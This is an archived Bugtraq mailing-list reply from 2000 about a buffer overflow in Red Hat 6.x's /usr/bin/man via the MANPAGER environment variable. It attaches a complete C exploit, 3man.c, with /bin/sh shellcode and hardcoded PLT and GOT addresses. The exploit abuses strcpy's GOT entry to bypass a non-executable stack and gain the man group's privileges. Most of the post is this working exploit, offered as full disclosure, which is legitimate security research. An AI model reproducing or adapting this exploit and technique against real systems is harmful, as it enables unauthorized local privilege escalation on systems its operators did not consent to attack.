[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: man-exploit for MANPAGER environment...
From:       Mariusz Woloszyn <emsi () IT ! PL>
Date:       2000-04-26 8:28:46
[Download RAW message or body]

On Mon, 24 Apr 2000 psychoid@GMX.NET wrote:

> For the sake of full disclosure an exploit for the MANPAGER environment
> variable:
> 
> - snip -
> 
> /*
> * MAN-Exploit for MANPAGER environmental variable.
> * rh 6.x, tested on rh 6.1
> * written by psychoid/tCl
> * gives egid man.
> *
> * Originally discovered by lcamtuf.
> * educational. yes.
> *
> */
> 

For absolutely FULL disclosure here is wonderfull man sploit (allready
posted to vuln-dev in thread of sth...) that works cool even if stack is
nonexecutable (it exploits the feature of GOT being executable -- see
vuln-dev archives for details: \
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-04-15&msg=Pine.GSO.4.03.10004201510040.12388-100000@zloty.it.com.pl).


GreetZ Bulba, Lam3rZ, teso, hert, Smerda Jajeczny.

Kil3r / Emsi / M.C.Mar /

--
Mariusz Wołoszyn
Internet Security Specialist, Internet Partners, GTS Poland


["3man.c" (TEXT/PLAIN)]

/*
 * Rewriten from:
 * (c) 2000 babcia padlina / b0f
 * (lcamtuf's idea)
 * by Kil3r of Lam3rZ
 * for nonexec stack environment
 * 
 * redhat 6.1 (and others) /usr/bin/man exploit
*/

	char execshell[] =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";


#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>

#define STRCPY		0x80490e4	// <== strcpy() PLT entry
#define	GOT		0x805038c	// <== strcpy() GOT entry
#define NOP		0x90
#define BUFSIZE		4033+38
#define RET		STRCPY		//0x46464646
#define _BIN_SH		0xbfffffe7 	// <== where we have "/bin/sh" string,
					//    curently useless ;)
#define SHELLCODE	0xbfffffc1

long getesp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(argc, argv)
int argc;
char **argv;
{
	char buf[BUFSIZE], *p;
	char *env[3];
	int *ap;

	memset(buf,NOP,BUFSIZE);

	p=buf+BUFSIZE-4;
	ap=(int *)p;
	*ap++ =RET;
	*ap++ =GOT+4;
	*ap++ =GOT+4;
	*ap++ =SHELLCODE;

	fprintf(stderr, "RET: 0x%x  SHELLCODE: 0x%x", RET, SHELLCODE);

	memcpy(buf,"MANPAGER=", 9);
	env[0]=buf;
//	env[1]="/bin/sh";
	env[1]=execshell;
	env[2]=(char *)0;
	execle("/usr/bin/man", "man", "ls", 0, env); // use execle to have
				// shellcode and other params at fixed addr!!!

	return 0;
}


[prev in list] [next in list] [prev in thread] [next in thread]